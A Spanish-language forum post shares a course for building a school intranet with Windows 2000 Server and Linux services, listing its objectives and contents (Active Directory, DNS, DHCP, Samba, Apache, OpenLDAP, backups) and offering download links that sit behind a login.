Para ello se parte de un supuesto Centro Educativo que habiendo detectado una serie de deficiencias en su gestión de la información, desea implantar una intranet educativa, agilizando la gestión de la información y evitando las tediosas tareas de instalación, reinstalación y mantenimiento de los equipos informáticos de las aulas del alumnado y del profesorado. Todo ello de forma totalmente práctica y con la finalidad última de crear una Intranet en nuestro centro, que nos permita ofrecer multitud de recursos para el profesorado y el alumnado y liberarnos de muchas labores que hasta ahora se realizaban de forma manual.

OBJETIVOS

Windows:

1.- Instalar un servidor Windows y configurar los servicios de Active Directory, Servidor DNS, DHCP, RIS.
2.- Utilizar los servicios de Terminal Remota para interactuar remotamente con el servidor
3.- Ser capaz de realizar una gestión eficaz de los usuarios y de los grupos
4.- Configurar y gestionar los servicios de impresión y de salvaguarda de los datos
5.- Ser capaz de realizar la instalación, actualización, desinstalación y distribución de software a los usuarios y a los equipos clientes de forma automatizada.
6.- Instalar y configurar y explotar una Intranet Educativa, creando carpetas de acceso público y privado para el almacenamiento de archivos, la creación de páginas web informativas de acceso público y privado, la transferencia de archivos entre usuarios, etc.
7.- Configurar un servicio de enrutamiento para mejorar las prestaciones del acceso a Internet.

Linux:

1.- Conocer los diferentes servicios de Intranet y su aplicación práctica en la red local.
2.- Habilitar servicios que faciliten la administración de la red y mejoren su rendimiento.
3.- Configurar el servidor de acuerdo con las necesidades.
4.- Asegurar la confidencialidad y disponibilidad de la información, facilitar su acceso y evitar su pérdida.
5.- Optimizar la utilización de los recursos informáticos para un mayor aprovechamiento de los mismos.
CONTENIDOS

Windows

Introducción
Directivas o Políticas de Grupo
Instalación de W2000 Server
Servidores de Impresión
Seguridad
Paquetes MSI
Active Directory
Entidad certificadora
Servidor DNS
Servidor web MSI
Servidor DHCP
Servidor correo Exchange
Servidor RIS
Cortafuegos ISA Server
Terminal Server
Copias de Seguridad
VNC
Enrutamiento
Usuarios

Linux

Introducción
Entidad Certificadora
Samba
Servidor web Apache
Servidor DNS
OpenLDAP
Servidor DHCP
Otros servicios
Servidor de terminales
Servidores de impresión
VNC
Copias de Seguridad (Backup)
Usuarios del sistema Unix
Enrutamiento

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero Que les Sirva---[/font]

Saludos..

Páginas1